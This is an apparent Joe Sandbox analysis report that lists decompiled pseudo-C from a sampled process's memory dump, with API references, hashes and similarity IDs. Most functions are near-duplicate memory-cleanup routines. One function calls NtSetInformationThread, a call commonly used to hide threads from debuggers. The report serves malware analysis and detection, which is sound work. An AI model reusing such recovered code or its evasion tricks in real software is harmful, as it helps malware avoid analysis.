                        • Instruction ID: e91cbf5de8d7fc6c339dd26e63dfcad1f0db25d2fec98a1a762030de97f652b0
                        • Opcode Fuzzy Hash: ac849cedba77418991424255e408e7d15a5f2fb1f910444dda1e6fe352ea78c0
                        • Instruction Fuzzy Hash: C431E27DF812109AEB60BFEC9949B7C37A6AF64B04F144856F205D6581CBB54051CFA3
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 58%
                        			E02882053(void* __ecx) {
                        				void* _t92;
                        
                        				E02880778( *((intOrPtr*)(_t92 - 0x7c)), __ecx,  *((intOrPtr*)(_t92 - 0x2a4)),  *(_t92 - 4),  *(_t92 - 0x22) +  *((intOrPtr*)(_t92 - 0x29c))); // executed
                        				if( *(_t92 + 0x1c) == 0 || ( *( *(_t92 + 0x1c)) & 0x0000ffff) != 0x22) {
                        					 *(_t92 - 0x2b2) = 1;
                        				} else {
                        					 *(_t92 - 0x2b2) = 0;
                        				}
                        				if(( *(_t92 - 0x2b2) & 0x000000ff) == 0) {
                        					( *(_t92 + 0x1c))[1] = ( *(_t92 + 0x1c))[1] & 0x00000000;
                        					( *(_t92 + 0x1c))[3] =  *(_t92 - 0x22);
                        					( *(_t92 + 0x1c))[5] =  *(_t92 - 0x26);
                        					( *(_t92 + 0x1c))[7] =  *(_t92 - 4);
                        					( *(_t92 + 0x1c))[0xd] =  *(_t92 - 0x84);
                        					( *(_t92 + 0x1c))[9] =  *(_t92 - 0x26) +  *((intOrPtr*)(_t92 - 0x29c));
                        					( *(_t92 + 0x1c))[0xb] =  *(_t92 - 0x22) +  *((intOrPtr*)(_t92 - 0x29c));
                        					( *(_t92 + 0x1c))[0xf] = ( *(_t92 + 0x1c))[0xf] & 0x00000000;
                        				}
                        				VirtualFree( *(_t92 - 0x10), 0, 0x8000); // executed
                        				if( *((intOrPtr*)(_t92 - 0x2a4)) != 0 &&  *((intOrPtr*)(_t92 - 0x80)) == 0) {
                        					 *0x289f824( *((intOrPtr*)(_t92 - 0x2a4)));
                        				}
                        				if( *(_t92 + 0xc) == 0 || ( *( *(_t92 + 0xc)) & 0x0000ffff) != 0xe) {
                        					 *(_t92 - 0x2b3) = 1;
                        				} else {
                        					 *(_t92 - 0x2b3) = 0;
                        				}
                        				if(( *(_t92 - 0x2b3) & 0x000000ff) == 1 ||  *(_t92 + 0xc) != 0 && (( *(_t92 + 0xc))[3] & 0x00000001) == 0) {
                        					E02880F88(_t92 - 0x30);
                        				}
                        				 *0x289f824( *((intOrPtr*)(_t92 - 0x2e)));
                        				E028617E4( *((intOrPtr*)(_t92 - 0x70))); // executed
                        				return 0;
                        			}

                        APIs
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00000000,00000000,00000006,00000000,00000D56,00000006,00000000,00002672,00000000,?,00000040,00000000), ref: 02882127
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00002672,00000000,00000000,00000000,00000478,?,0000002A,?,00000012,?,00000208,00000000), ref: 028821C1
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: d1ca62634af6de2e9cd42cc9611e10b8f3dfbfff6f031acb72ebfc8cb89a4a7c
                        • Instruction ID: 9897284546d39d5ab3f542ebaaaa33c678b0d82cea3ae2ecf87cc34c219c8625
                        • Opcode Fuzzy Hash: d1ca62634af6de2e9cd42cc9611e10b8f3dfbfff6f031acb72ebfc8cb89a4a7c
                        • Instruction Fuzzy Hash: DA41E83DA04259DFCB25EF48C848BADB7B1BF09305F148096E919EB295C735E954DF10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 50%
                        			E02882055() {
                        				void* _t82;
                        
                        				if( *(_t82 + 0x1c) == 0 || ( *( *(_t82 + 0x1c)) & 0x0000ffff) != 0x22) {
                        					 *(_t82 - 0x2b2) = 1;
                        				} else {
                        					 *(_t82 - 0x2b2) = 0;
                        				}
                        				if(( *(_t82 - 0x2b2) & 0x000000ff) == 0) {
                        					( *(_t82 + 0x1c))[1] = ( *(_t82 + 0x1c))[1] & 0x00000000;
                        					( *(_t82 + 0x1c))[3] =  *(_t82 - 0x22);
                        					( *(_t82 + 0x1c))[5] =  *(_t82 - 0x26);
                        					( *(_t82 + 0x1c))[7] =  *(_t82 - 4);
                        					( *(_t82 + 0x1c))[0xd] =  *(_t82 - 0x84);
                        					( *(_t82 + 0x1c))[9] =  *(_t82 - 0x26) +  *((intOrPtr*)(_t82 - 0x29c));
                        					( *(_t82 + 0x1c))[0xb] =  *(_t82 - 0x22) +  *((intOrPtr*)(_t82 - 0x29c));
                        					( *(_t82 + 0x1c))[0xf] = ( *(_t82 + 0x1c))[0xf] & 0x00000000;
                        				}
                        				VirtualFree( *(_t82 - 0x10), 0, 0x8000); // executed
                        				if( *((intOrPtr*)(_t82 - 0x2a4)) != 0 &&  *((intOrPtr*)(_t82 - 0x80)) == 0) {
                        					 *0x289f824( *((intOrPtr*)(_t82 - 0x2a4)));
                        				}
                        				if( *(_t82 + 0xc) == 0 || ( *( *(_t82 + 0xc)) & 0x0000ffff) != 0xe) {
                        					 *(_t82 - 0x2b3) = 1;
                        				} else {
                        					 *(_t82 - 0x2b3) = 0;
                        				}
                        				if(( *(_t82 - 0x2b3) & 0x000000ff) == 1 ||  *(_t82 + 0xc) != 0 && (( *(_t82 + 0xc))[3] & 0x00000001) == 0) {
                        					E02880F88(_t82 - 0x30);
                        				}
                        				 *0x289f824( *((intOrPtr*)(_t82 - 0x2e)));
                        				E028617E4( *((intOrPtr*)(_t82 - 0x70))); // executed
                        				return 0;
                        			}

                        APIs
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00000000,00000000,00000006,00000000,00000D56,00000006,00000000,00002672,00000000,?,00000040,00000000), ref: 02882127
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00002672,00000000,00000000,00000000,00000478,?,0000002A,?,00000012,?,00000208,00000000), ref: 028821C1
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: 77e1b1fad58d1e68a77a86d9778437408aceffbb1b31d438a13a5424fac4b126
                        • Instruction ID: 89a1e833461318f2666a41e838f35f1190dfac6be84ec96c474d1f0eda812e56
                        • Opcode Fuzzy Hash: 77e1b1fad58d1e68a77a86d9778437408aceffbb1b31d438a13a5424fac4b126
                        • Instruction Fuzzy Hash: 8231D33DA04259CFCB25EF48C848BADB7B1BF05305F14809AE919EB295C334E995CF10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 92%
                        			E02884444(void* __ecx, signed int* _a4) {
                        				signed int _v8;
                        				intOrPtr _t7;
                        				signed int* _t9;
                        				signed int _t12;
                        				intOrPtr _t15;
                        
                        				_t10 = __ecx;
                        				_push(__ecx);
                        				_v8 = _v8 & 0x00000000;
                        				_t7 = E02865E00(E0288E905, 0, 0, 0x16, 0,  &_v8, 0x50); // executed
                        				_t15 = _t7;
                        				if(_t15 != 0) {
                        					Sleep(0xc8); // executed
                        					_t12 = _v8;
                        					 *0x28a40fc = _t15;
                        					 *0x28a410c = _t12; // executed
                        					E02865BED(_t10, _t15); // executed
                        					_t9 = _a4;
                        					if(_t9 != 0) {
                        						 *_t9 = _t12;
                        					}
                        					_t7 = _t15;
                        				}
                        				return _t7;
                        			}

                        APIs
                        • Sleep.KERNEL32(000000C8,00000FA0,0288E905,00000000,00000000,00000016,00000000,00000000,00000050,00000000,?,?,0286DF35,0286E0E2), ref: 02884471
                          • Part of subcall function 02865BED: NtSetInformationThread.NTDLL(00000000,00000003,000000FF,00000004,?,?,0288448C,00000000,?,?,0286DF35,0286E0E2), ref: 02865C06
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: InformationSleepThread
                        • String ID:
                        • API String ID: 1275441292-0
                        • Opcode ID: 420c1dcc6fd5ca37c9a68e370f23098718e8f1ec16bb2b400b44fbd0291071a9
                        • Instruction ID: b217267436c2cb8d90756f73f8beb879471ec7bb04b9d019f1434fa26cea4df1
                        • Opcode Fuzzy Hash: 420c1dcc6fd5ca37c9a68e370f23098718e8f1ec16bb2b400b44fbd0291071a9
                        • Instruction Fuzzy Hash: B8F0E97EB81314BBE720AF899C06F5A77ACDB81B41F544015B600FB1C0D7F499009FA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 50%
                        			E02881BEB(void* __eflags) {
                        				void* _t13;
                        				void* _t22;
                        
                        				E02880F3D(_t22 - 0x30,  *((intOrPtr*)(_t22 - 0x2a4)));
                        				if( *(_t22 - 0x10) != 0) {
                        					VirtualFree( *(_t22 - 0x10), 0, 0x8000); // executed
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x1c)) != 0) {
                        					 *0x289f824( *((intOrPtr*)(_t22 - 0x1c)));
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x2a4)) != 0 &&  *((intOrPtr*)(_t22 - 0x80)) == 0) {
                        					 *0x289f824( *((intOrPtr*)(_t22 - 0x2a4)));
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x70)) != 0) {
                        					E028617E4( *((intOrPtr*)(_t22 - 0x70)));
                        				}
                        				_t13 = 0xfffffff9;
                        				return _t13;
                        			}

                        APIs
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00002672,00000000,00000000,00000000,00000478,?,0000002A,?,00000012,?,00000208,00000000), ref: 028821C1
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: b589f7717b82c2c5a3337530131b505c6f4f907840b4ed12ec4282c28ab8671e
                        • Instruction ID: 5858143b66a95c1f6da17752774b388300bff7293b986d2838c94329cebc7033
                        • Opcode Fuzzy Hash: b589f7717b82c2c5a3337530131b505c6f4f907840b4ed12ec4282c28ab8671e
                        • Instruction Fuzzy Hash: 72F0493DA0016ADFDF216B98EC0C7ECB672BF0031AF240121E615F04E9CBB52995DE00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 50%
                        			E02881E8A(void* __eflags) {
                        				void* _t13;
                        				void* _t22;
                        
                        				E02880F3D(_t22 - 0x30,  *((intOrPtr*)(_t22 - 0x2a4)));
                        				if( *(_t22 - 0x10) != 0) {
                        					VirtualFree( *(_t22 - 0x10), 0, 0x8000); // executed
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x1c)) != 0) {
                        					 *0x289f824( *((intOrPtr*)(_t22 - 0x1c)));
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x2a4)) != 0 &&  *((intOrPtr*)(_t22 - 0x80)) == 0) {
                        					 *0x289f824( *((intOrPtr*)(_t22 - 0x2a4)));
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x70)) != 0) {
                        					E028617E4( *((intOrPtr*)(_t22 - 0x70)));
                        				}
                        				_t13 = 0xfffffff9;
                        				return _t13;
                        			}

                        APIs
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00002672,00000000,00000000,00000000,00000478,?,0000002A,?,00000012,?,00000208,00000000), ref: 028821C1
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: 10cc68514a679643c8bda60f1690985613dfc1abdf016630edff4db1e33fa482
                        • Instruction ID: 5858143b66a95c1f6da17752774b388300bff7293b986d2838c94329cebc7033
                        • Opcode Fuzzy Hash: 10cc68514a679643c8bda60f1690985613dfc1abdf016630edff4db1e33fa482
                        • Instruction Fuzzy Hash: 72F0493DA0016ADFDF216B98EC0C7ECB672BF0031AF240121E615F04E9CBB52995DE00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 50%
                        			E02881EDB(void* __eflags) {
                        				void* _t13;
                        				void* _t22;
                        
                        				E02880F3D(_t22 - 0x30,  *((intOrPtr*)(_t22 - 0x2a4)));
                        				if( *(_t22 - 0x10) != 0) {
                        					VirtualFree( *(_t22 - 0x10), 0, 0x8000); // executed
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x1c)) != 0) {
                        					 *0x289f824( *((intOrPtr*)(_t22 - 0x1c)));
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x2a4)) != 0 &&  *((intOrPtr*)(_t22 - 0x80)) == 0) {
                        					 *0x289f824( *((intOrPtr*)(_t22 - 0x2a4)));
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x70)) != 0) {
                        					E028617E4( *((intOrPtr*)(_t22 - 0x70)));
                        				}
                        				_t13 = 0xfffffff9;
                        				return _t13;
                        			}

                        APIs
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00002672,00000000,00000000,00000000,00000478,?,0000002A,?,00000012,?,00000208,00000000), ref: 028821C1
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: 3ffc2a3f713032aed3c3f34df3e910550cfc0ce476398e6034f2797bac4235e3
                        • Instruction ID: 5858143b66a95c1f6da17752774b388300bff7293b986d2838c94329cebc7033
                        • Opcode Fuzzy Hash: 3ffc2a3f713032aed3c3f34df3e910550cfc0ce476398e6034f2797bac4235e3
                        • Instruction Fuzzy Hash: 72F0493DA0016ADFDF216B98EC0C7ECB672BF0031AF240121E615F04E9CBB52995DE00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 50%
                        			E02881E01(void* __eflags) {
                        				void* _t13;
                        				void* _t22;
                        
                        				E02880F3D(_t22 - 0x30,  *((intOrPtr*)(_t22 - 0x2a4)));
                        				if( *(_t22 - 0x10) != 0) {
                        					VirtualFree( *(_t22 - 0x10), 0, 0x8000); // executed
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x1c)) != 0) {
                        					 *0x289f824( *((intOrPtr*)(_t22 - 0x1c)));
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x2a4)) != 0 &&  *((intOrPtr*)(_t22 - 0x80)) == 0) {
                        					 *0x289f824( *((intOrPtr*)(_t22 - 0x2a4)));
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x70)) != 0) {
                        					E028617E4( *((intOrPtr*)(_t22 - 0x70)));
                        				}
                        				_t13 = 0xfffffff9;
                        				return _t13;
                        			}

                        0x028821ac 0x028821b5 0x028821c1 0x028821c1 0x028821cb 0x028821d0 0x028821d0 0x028821dd 0x028821eb 0x028821eb 0x028821f5 0x028821fa 0x028821fa 0x02882201 0x02882206

                        APIs
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00002672,00000000,00000000,00000000,00000478,?,0000002A,?,00000012,?,00000208,00000000), ref: 028821C1
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: c83355f2dcc59367969fbba9e47853e2c32be66b8c8c4211190f64edbf5892c4
                        • Instruction ID: 5858143b66a95c1f6da17752774b388300bff7293b986d2838c94329cebc7033
                        • Opcode Fuzzy Hash: c83355f2dcc59367969fbba9e47853e2c32be66b8c8c4211190f64edbf5892c4
                        • Instruction Fuzzy Hash: 72F0493DA0016ADFDF216B98EC0C7ECB672BF0031AF240121E615F04E9CBB52995DE00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 50%
                        			E02881E29(void* __eflags) {
                        				void* _t13;
                        				void* _t22;
                        
                        				E02880F3D(_t22 - 0x30,  *((intOrPtr*)(_t22 - 0x2a4)));
                        				if( *(_t22 - 0x10) != 0) {
                        					VirtualFree( *(_t22 - 0x10), 0, 0x8000); // executed
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x1c)) != 0) {
                        					 *0x289f824( *((intOrPtr*)(_t22 - 0x1c)));
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x2a4)) != 0 &&  *((intOrPtr*)(_t22 - 0x80)) == 0) {
                        					 *0x289f824( *((intOrPtr*)(_t22 - 0x2a4)));
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x70)) != 0) {
                        					E028617E4( *((intOrPtr*)(_t22 - 0x70)));
                        				}
                        				_t13 = 0xfffffff9;
                        				return _t13;
                        			}

                        0x028821ac 0x028821b5 0x028821c1 0x028821c1 0x028821cb 0x028821d0 0x028821d0 0x028821dd 0x028821eb 0x028821eb 0x028821f5 0x028821fa 0x028821fa 0x02882201 0x02882206

                        APIs
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00002672,00000000,00000000,00000000,00000478,?,0000002A,?,00000012,?,00000208,00000000), ref: 028821C1
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: a23e626f36b48bf964a377ff2ecc8c3c6a8efe2e190634e43ee16465abee1f4e
                        • Instruction ID: 5858143b66a95c1f6da17752774b388300bff7293b986d2838c94329cebc7033
                        • Opcode Fuzzy Hash: a23e626f36b48bf964a377ff2ecc8c3c6a8efe2e190634e43ee16465abee1f4e
                        • Instruction Fuzzy Hash: 72F0493DA0016ADFDF216B98EC0C7ECB672BF0031AF240121E615F04E9CBB52995DE00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 50%
                        			E02881E62(void* __eflags) {
                        				void* _t13;
                        				void* _t22;
                        
                        				E02880F3D(_t22 - 0x30,  *((intOrPtr*)(_t22 - 0x2a4)));
                        				if( *(_t22 - 0x10) != 0) {
                        					VirtualFree( *(_t22 - 0x10), 0, 0x8000); // executed
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x1c)) != 0) {
                        					 *0x289f824( *((intOrPtr*)(_t22 - 0x1c)));
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x2a4)) != 0 &&  *((intOrPtr*)(_t22 - 0x80)) == 0) {
                        					 *0x289f824( *((intOrPtr*)(_t22 - 0x2a4)));
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x70)) != 0) {
                        					E028617E4( *((intOrPtr*)(_t22 - 0x70)));
                        				}
                        				_t13 = 0xfffffff9;
                        				return _t13;
                        			}

                        0x028821ac 0x028821b5 0x028821c1 0x028821c1 0x028821cb 0x028821d0 0x028821d0 0x028821dd 0x028821eb 0x028821eb 0x028821f5 0x028821fa 0x028821fa 0x02882201 0x02882206

                        APIs
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00002672,00000000,00000000,00000000,00000478,?,0000002A,?,00000012,?,00000208,00000000), ref: 028821C1
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: fd2a189d81406adf58addfe5bd1f969336a822ef53cdcf3c3e149b84824ba322
                        • Instruction ID: 5858143b66a95c1f6da17752774b388300bff7293b986d2838c94329cebc7033
                        • Opcode Fuzzy Hash: fd2a189d81406adf58addfe5bd1f969336a822ef53cdcf3c3e149b84824ba322
                        • Instruction Fuzzy Hash: 72F0493DA0016ADFDF216B98EC0C7ECB672BF0031AF240121E615F04E9CBB52995DE00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 50%
                        			E02881F82(void* __eflags) {
                        				void* _t13;
                        				void* _t22;
                        
                        				E02880F3D(_t22 - 0x30,  *((intOrPtr*)(_t22 - 0x2a4)));
                        				if( *(_t22 - 0x10) != 0) {
                        					VirtualFree( *(_t22 - 0x10), 0, 0x8000); // executed
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x1c)) != 0) {
                        					 *0x289f824( *((intOrPtr*)(_t22 - 0x1c)));
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x2a4)) != 0 &&  *((intOrPtr*)(_t22 - 0x80)) == 0) {
                        					 *0x289f824( *((intOrPtr*)(_t22 - 0x2a4)));
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x70)) != 0) {
                        					E028617E4( *((intOrPtr*)(_t22 - 0x70)));
                        				}
                        				_t13 = 0xfffffff9;
                        				return _t13;
                        			}

                        0x028821ac 0x028821b5 0x028821c1 0x028821c1 0x028821cb 0x028821d0 0x028821d0 0x028821dd 0x028821eb 0x028821eb 0x028821f5 0x028821fa 0x028821fa 0x02882201 0x02882206

                        APIs
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00002672,00000000,00000000,00000000,00000478,?,0000002A,?,00000012,?,00000208,00000000), ref: 028821C1
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: aad9033b642ef9ae16e90c372f344181d3fa6c362ed1a0a048d0502159ae28c4
                        • Instruction ID: 5858143b66a95c1f6da17752774b388300bff7293b986d2838c94329cebc7033
                        • Opcode Fuzzy Hash: aad9033b642ef9ae16e90c372f344181d3fa6c362ed1a0a048d0502159ae28c4
                        • Instruction Fuzzy Hash: 72F0493DA0016ADFDF216B98EC0C7ECB672BF0031AF240121E615F04E9CBB52995DE00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 50%
                        			E02881F16(void* __eflags) {
                        				void* _t13;
                        				void* _t22;
                        
                        				E02880F3D(_t22 - 0x30,  *((intOrPtr*)(_t22 - 0x2a4)));
                        				if( *(_t22 - 0x10) != 0) {
                        					VirtualFree( *(_t22 - 0x10), 0, 0x8000); // executed
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x1c)) != 0) {
                        					 *0x289f824( *((intOrPtr*)(_t22 - 0x1c)));
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x2a4)) != 0 &&  *((intOrPtr*)(_t22 - 0x80)) == 0) {
                        					 *0x289f824( *((intOrPtr*)(_t22 - 0x2a4)));
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x70)) != 0) {
                        					E028617E4( *((intOrPtr*)(_t22 - 0x70)));
                        				}
                        				_t13 = 0xfffffff9;
                        				return _t13;
                        			}

                        0x028821ac 0x028821b5 0x028821c1 0x028821c1 0x028821cb 0x028821d0 0x028821d0 0x028821dd 0x028821eb 0x028821eb 0x028821f5 0x028821fa 0x028821fa 0x02882201 0x02882206

                        APIs
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00002672,00000000,00000000,00000000,00000478,?,0000002A,?,00000012,?,00000208,00000000), ref: 028821C1
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: 78e306b7a0c62c34d2a068d561d293c01981b24c7328eb68afa0bb217289c97c
                        • Instruction ID: 5858143b66a95c1f6da17752774b388300bff7293b986d2838c94329cebc7033
                        • Opcode Fuzzy Hash: 78e306b7a0c62c34d2a068d561d293c01981b24c7328eb68afa0bb217289c97c
                        • Instruction Fuzzy Hash: 72F0493DA0016ADFDF216B98EC0C7ECB672BF0031AF240121E615F04E9CBB52995DE00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 50%
                        			E02881C06(void* __eflags) {
                        				void* _t13;
                        				void* _t22;
                        
                        				E02880F3D(_t22 - 0x30,  *((intOrPtr*)(_t22 - 0x2a4)));
                        				if( *(_t22 - 0x10) != 0) {
                        					VirtualFree( *(_t22 - 0x10), 0, 0x8000); // executed
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x1c)) != 0) {
                        					 *0x289f824( *((intOrPtr*)(_t22 - 0x1c)));
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x2a4)) != 0 &&  *((intOrPtr*)(_t22 - 0x80)) == 0) {
                        					 *0x289f824( *((intOrPtr*)(_t22 - 0x2a4)));
                        				}
                        				if( *((intOrPtr*)(_t22 - 0x70)) != 0) {
                        					E028617E4( *((intOrPtr*)(_t22 - 0x70)));
                        				}
                        				_t13 = 0xfffffff9;
                        				return _t13;
                        			}

                        0x028821ac 0x028821b5 0x028821c1 0x028821c1 0x028821cb 0x028821d0 0x028821d0 0x028821dd 0x028821eb 0x028821eb 0x028821f5 0x028821fa 0x028821fa 0x02882201 0x02882206

                        APIs
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00002672,00000000,00000000,00000000,00000478,?,0000002A,?,00000012,?,00000208,00000000), ref: 028821C1
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: 0bc737f0b483573194721a43e2679675241b0b28bc17263651f515b218c26e1c
                        • Instruction ID: 5858143b66a95c1f6da17752774b388300bff7293b986d2838c94329cebc7033
